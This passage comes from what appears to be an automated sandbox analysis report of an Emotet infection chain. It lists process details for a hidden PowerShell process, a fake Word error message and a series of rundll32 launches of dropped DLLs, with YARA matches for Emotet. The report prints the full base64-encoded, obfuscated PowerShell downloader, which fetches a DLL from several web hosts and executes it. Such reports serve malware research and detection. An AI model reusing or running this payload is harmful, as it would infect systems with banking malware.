KQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoAGgAJwArACcAYgAnACkAKQArACgAJwBwAHIAaQB2AGkAbABlACcAKwAnAGcAJwApACsAKAAnAGUAJwArACcAZAAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAHEAcQApACgAcwAyACkAJwArACcAKABjAGcAJwArACcAaQAtAGIAaQBuACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKAAnACsAJwBzADIAKQAnACkAKQArACgAKAAnACgAawBjAGcAJwArACcAZwBGAHEAcQAnACkAKQArACgAKAAnACkAJwArACcAKABzADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6ACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAKAAoACcAcwAyACkAKAAnACsAJwBxACcAKQApACsAKAAoACcAcQApACgAJwArACcAcwAyACkAKAAnACsAJwBsACcAKwAnAG8AYwAnACkAKQArACcAYQBsACcAKwAnAGEAZgAnACsAKAAnAGYAbwAnACsAJwByAGQAYQBiACcAKwAnAGwAJwArACcAZQByACcAKQArACgAJwBvAG8AZgAnACsAJwBlACcAKQArACcAcgAuACcAKwAnAGMAbwAnACsAKAAoACcAbQBxACcAKwAnAHEAKQAoAHMAMgAnACsAJwApACcAKQApACsAJwAoACcAKwAoACcAcgAnACsAJwBhAGwAJwApACsAJwBwAGgAJwArACcAcwAtACcAKwAnAHIAJwArACgAJwBlACcAKwAnAGMAZQAnACkAKwAoACgAJwBpAHAAdAAtAGYAMgB1AGgAJwArACcAZgBxAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABxACcAKQApACsAJwBUACcAKwAoACcAVAAnACsAJwA1AEQAQwAnACkAKwAnAHEAcQAnACsAJwApACcAKwAoACgAJwAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABAACcAKwAnAGgAdAAnACsAJwB0AHAAcwAnACkAKQArACgAKAAnADoAJwArACcAcQAnACsAJwBxACkAKABzADIAKQAnACkAKQArACgAJwAoACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBqAG8AaABuAGgAYQAnACsAJwB5ACcAKQApACsAKAAnAGQAZQBuACcAKwAnAHcAcgAnACsAJwBpACcAKQArACgAJwB0AGUAJwArACcAcwAnACkAKwAnAC4AJwArACcAYwBvACcAKwAoACgAJwBtACcAKwAnAHEAcQAnACsAJwApACcAKwAnACgAcwAyACkAKAB0AHIAYQBjAGsAXwB1ACcAKQApACsAKAAnAHIAbAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoACcAKwAnAHMAMgApACcAKwAnACgAUAAnACsAJwBxAHEAKQAnACkAKQArACgAJwAoAHMAJwArACcAMgApACcAKQArACcAKAAnACsAKAAnAEAAJwArACcAaAAnACsAJwB0AHQAcABzADoAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACcAKAAnACsAJwBzADIAKQAnACkAKwAnACgAJwArACgAKAAnAHEAJwArACcAcQApACgAJwArACcAcwAnACsAJwAyACkAKABuACcAKQApACsAKAAnAGEAJwArACcAaABsAGEAcwBvAGwAJwArACcAaQAnACsAJwBtACcAKQArACgAJwBhAG4AZABlAHMAJwArACcAaQAnACkAKwAoACcAZwBuACcAKwAnAHMAJwApACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0AcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKwAnACgAbgBhACcAKwAnAGgAbABhADMAJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoACcAKwAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABkAHEAcQApACgAJwArACcAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAQABoAHQAdAAnACsAJwBwACcAKQApACsAKAAoACcAcwAnACsAJwA6AHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAZgAnACsAJwBvAG8AJwApACkAKwAnAHQAJwArACgAJwBiAGEAJwArACcAbABsAC0AJwApACsAKAAoACcAZQBnAC4AYwAnACsAJwBvAG0AJwArACcAcQBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwAyACkAKAB3AGUAJwArACcAYgBfAG0AYQAnACsAJwBwACcAKQApACsAKAAoACcAcQBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAG4AJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoAHMAMgAnACsAJwApACgAQABoACcAKwAnAHQAJwApACkAKwAoACcAdABwACcAKwAnAHMAJwApACsAKAAoACcAOgBxACcAKwAnAHEAKQAoACcAKwAnAHMAMgApACgAcQAnACsAJwBxACkAKAAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAdgAnACkAKQArACcAaQAnACsAJwBlACcAKwAnAHQAbgAnACsAKAAnAGgAYQAnACsAJwBiAGkAJwApACsAKAAoACcAZQAnACsAJwBuAGgAbwBhAC4AYwBvAG0AcQBxACkAJwArACcAKABzADIAJwArACcAKQAoACcAKQApACsAKAAnAHcAbwByACcAKwAnAGQAcAAnACkAKwAoACgAJwByACcAKwAnAGUAcwBzAHEAcQAnACsAJwApACgAcwAnACsAJwAyACcAKQApACsAJwApACcAKwAnACgAJwArACcAUQAnACsAKAAoACcAVQBUAHkAcQAnACsAJwBxACkAKAAnACsAJwBzADIAKQAoACcAKQApACkAKQAuACIAcgBFAGAAUABsAEEAYwBlACIAKAAoACgAKAAoACcAcQAnACsAJwBxACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAHMAYABQAEwASQB0ACIAKAAkAEYANwAzAGcANwA5AG0AIAArACAAJABNAGoANQBuAHAAdwBfACAAKwAgACQASQBjAHcAdQAyADMAOAApADsAJABYAGQAXwBjAHAAdwBfAD0AKAAnAFUAJwArACgAJwBoACcAKwAnAHoAZgBxACcAKQArACcAMgAyACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwB0AF8AYgB1AGQAbAAgAGkAbgAgACQAQwBqADUAawB3AG4AbQAgAHwAIABTAGAATwBSAHQALQBPAGIAagBgAGUAYABDAHQAIAB7AGcARQBgAFQAYAAtAGAAUgBBAG4AZABvAG0AfQApAHsAdAByAHkAewAkAFIAcAA1ADYAegByAGEALgAiAEQATwBXAG4AYABMAE8AYQBkAGYAYABJAGAAbABFACIAKAAkAE8AdABfAGIAdQBkAGwALAAgACQAQwAwAHcANwByAG8ANgApADsAJABNAHAAaQAyAHMAcwA0AD0AKAAoACcAUwAnACsAJwB6AF8AJwApACsAJwB3ACcAKwAoACcAeQBtACcAKwAnADEAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQwAwAHcANwByAG8ANgApAC4AIgBsAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADEAMwA2ACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEMAMAB3ADcAcgBvADYALAAnACMAMQAnAC4AIgBUAGAAbwBgAHMAVABSAEkAbgBnACIAKAApADsAJABFAGsAYwBvAGoAYgB3AD0AKAAoACcAVQBwACcAKwAnAHoAagBnACcAKQArACcAdwB3ACcAKQA7AGIAcgBlAGEAawA7ACQASgBjAG0AdABnAGIAbwA9ACgAKAAnAFIAbgAxACcAKwAnAHgAJwApACsAJwBuAGwAJwArACcAcAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAcABqAHIAegA1AGkAPQAoACcAUQAnACsAJwA1ADEAJwArACgAJwBkAGUAYwAnACsAJwB0ACcAKQApAA==
Imagebase:	0x4a660000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2508 Parent PID: 2332

General

Start time:	13:47:48
Start date:	26/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff790000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2536 Parent PID: 2332

General

Start time:	13:47:49
Start date:	26/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoAGgAJwArACcAYgAnACkAKQArACgAJwBwAHIAaQB2AGkAbABlACcAKwAnAGcAJwApACsAKAAnAGUAJwArACcAZAAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAHEAcQApACgAcwAyACkAJwArACcAKABjAGcAJwArACcAaQAtAGIAaQBuACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKAAnACsAJwBzADIAKQAnACkAKQArACgAKAAnACgAawBjAGcAJwArACcAZwBGAHEAcQAnACkAKQArACgAKAAnACkAJwArACcAKABzADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6ACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAKAAoACcAcwAyACkAKAAnACsAJwBxACcAKQApACsAKAAoACcAcQApACgAJwArACcAcwAyACkAKAAnACsAJwBsACcAKwAnAG8AYwAnACkAKQArACcAYQBsACcAKwAnAGEAZgAnACsAKAAnAGYAbwAnACsAJwByAGQAYQBiACcAKwAnAGwAJwArACcAZQByACcAKQArACgAJwBvAG8AZgAnACsAJwBlACcAKQArACcAcgAuACcAKwAnAGMAbwAnACsAKAAoACcAbQBxACcAKwAnAHEAKQAoAHMAMgAnACsAJwApACcAKQApACsAJwAoACcAKwAoACcAcgAnACsAJwBhAGwAJwApACsAJwBwAGgAJwArACcAcwAtACcAKwAnAHIAJwArACgAJwBlACcAKwAnAGMAZQAnACkAKwAoACgAJwBpAHAAdAAtAGYAMgB1AGgAJwArACcAZgBxAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABxACcAKQApACsAJwBUACcAKwAoACcAVAAnACsAJwA1AEQAQwAnACkAKwAnAHEAcQAnACsAJwApACcAKwAoACgAJwAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABAACcAKwAnAGgAdAAnACsAJwB0AHAAcwAnACkAKQArACgAKAAnADoAJwArACcAcQAnACsAJwBxACkAKABzADIAKQAnACkAKQArACgAJwAoACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBqAG8AaABuAGgAYQAnACsAJwB5ACcAKQApACsAKAAnAGQAZQBuACcAKwAnAHcAcgAnACsAJwBpACcAKQArACgAJwB0AGUAJwArACcAcwAnACkAKwAnAC4AJwArACcAYwBvACcAKwAoACgAJwBtACcAKwAnAHEAcQAnACsAJwApACcAKwAnACgAcwAyACkAKAB0AHIAYQBjAGsAXwB1ACcAKQApACsAKAAnAHIAbAAnACsAJwBxAHEAJwApACsAKAAoACcAKQAoACcAKwAnAHMAMgApACcAKwAnACgAUAAnACsAJwBxAHEAKQAnACkAKQArACgAJwAoAHMAJwArACcAMgApACcAKQArACcAKAAnACsAKAAnAEAAJwArACcAaAAnACsAJwB0AHQAcABzADoAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACcAKAAnACsAJwBzADIAKQAnACkAKwAnACgAJwArACgAKAAnAHEAJwArACcAcQApACgAJwArACcAcwAnACsAJwAyACkAKABuACcAKQApACsAKAAnAGEAJwArACcAaABsAGEAcwBvAGwAJwArACcAaQAnACsAJwBtACcAKQArACgAJwBhAG4AZABlAHMAJwArACcAaQAnACkAKwAoACcAZwBuACcAKwAnAHMAJwApACsAKAAnAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0AcQAnACsAJwBxACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKwAnACgAbgBhACcAKwAnAGgAbABhADMAJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoACcAKwAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABkAHEAcQApACgAJwArACcAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAQABoAHQAdAAnACsAJwBwACcAKQApACsAKAAoACcAcwAnACsAJwA6AHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAZgAnACsAJwBvAG8AJwApACkAKwAnAHQAJwArACgAJwBiAGEAJwArACcAbABsAC0AJwApACsAKAAoACcAZQBnAC4AYwAnACsAJwBvAG0AJwArACcAcQBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwAyACkAKAB3AGUAJwArACcAYgBfAG0AYQAnACsAJwBwACcAKQApACsAKAAoACcAcQBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAG4AJwApACkAKwAnAHEAJwArACgAKAAnAHEAKQAoAHMAMgAnACsAJwApACgAQABoACcAKwAnAHQAJwApACkAKwAoACcAdABwACcAKwAnAHMAJwApACsAKAAoACcAOgBxACcAKwAnAHEAKQAoACcAKwAnAHMAMgApACgAcQAnACsAJwBxACkAKAAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAdgAnACkAKQArACcAaQAnACsAJwBlACcAKwAnAHQAbgAnACsAKAAnAGgAYQAnACsAJwBiAGkAJwApACsAKAAoACcAZQAnACsAJwBuAGgAbwBhAC4AYwBvAG0AcQBxACkAJwArACcAKABzADIAJwArACcAKQAoACcAKQApACsAKAAnAHcAbwByACcAKwAnAGQAcAAnACkAKwAoACgAJwByACcAKwAnAGUAcwBzAHEAcQAnACsAJwApACgAcwAnACsAJwAyACcAKQApACsAJwApACcAKwAnACgAJwArACcAUQAnACsAKAAoACcAVQBUAHkAcQAnACsAJwBxACkAKAAnACsAJwBzADIAKQAoACcAKQApACkAKQAuACIAcgBFAGAAUABsAEEAYwBlACIAKAAoACgAKAAoACcAcQAnACsAJwBxACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAHMAYABQAEwASQB0ACIAKAAkAEYANwAzAGcANwA5AG0AIAArACAAJABNAGoANQBuAHAAdwBfACAAKwAgACQASQBjAHcAdQAyADMAOAApADsAJABYAGQAXwBjAHAAdwBfAD0AKAAnAFUAJwArACgAJwBoACcAKwAnAHoAZgBxACcAKQArACcAMgAyACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwB0AF8AYgB1AGQAbAAgAGkAbgAgACQAQwBqADUAawB3AG4AbQAgAHwAIABTAGAATwBSAHQALQBPAGIAagBgAGUAYABDAHQAIAB7AGcARQBgAFQAYAAtAGAAUgBBAG4AZABvAG0AfQApAHsAdAByAHkAewAkAFIAcAA1ADYAegByAGEALgAiAEQATwBXAG4AYABMAE8AYQBkAGYAYABJAGAAbABFACIAKAAkAE8AdABfAGIAdQBkAGwALAAgACQAQwAwAHcANwByAG8ANgApADsAJABNAHAAaQAyAHMAcwA0AD0AKAAoACcAUwAnACsAJwB6AF8AJwApACsAJwB3ACcAKwAoACcAeQBtACcAKwAnADEAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQwAwAHcANwByAG8ANgApAC4AIgBsAEUAYABOAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADEAMwA2ACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEMAMAB3ADcAcgBvADYALAAnACMAMQAnAC4AIgBUAGAAbwBgAHMAVABSAEkAbgBnACIAKAApADsAJABFAGsAYwBvAGoAYgB3AD0AKAAoACcAVQBwACcAKwAnAHoAagBnACcAKQArACcAdwB3ACcAKQA7AGIAcgBlAGEAawA7ACQASgBjAG0AdABnAGIAbwA9ACgAKAAnAFIAbgAxACcAKwAnAHgAJwApACsAJwBuAGwAJwArACcAcAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAcABqAHIAegA1AGkAPQAoACcAUQAnACsAJwA1ADEAJwArACgAJwBkAGUAYwAnACsAJwB0ACcAKQApAA==
Imagebase:	0x13f760000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2138019176.00000000003B6000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2138066373.0000000001CF4000.00000004.00000040.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 260 Parent PID: 2536

General

Start time:	13:48:04
Start date:	26/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Imagebase:	0xff970000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2908 Parent PID: 260

General

Start time:	13:48:04
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2872 Parent PID: 2908

General

Start time:	13:48:05
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2472 Parent PID: 2872

General

Start time:	13:48:06
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2488 Parent PID: 2472

General

Start time:	13:48:07
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2860 Parent PID: 2488

General

Start time:	13:48:07
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL
Imagebase:	0x6c0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
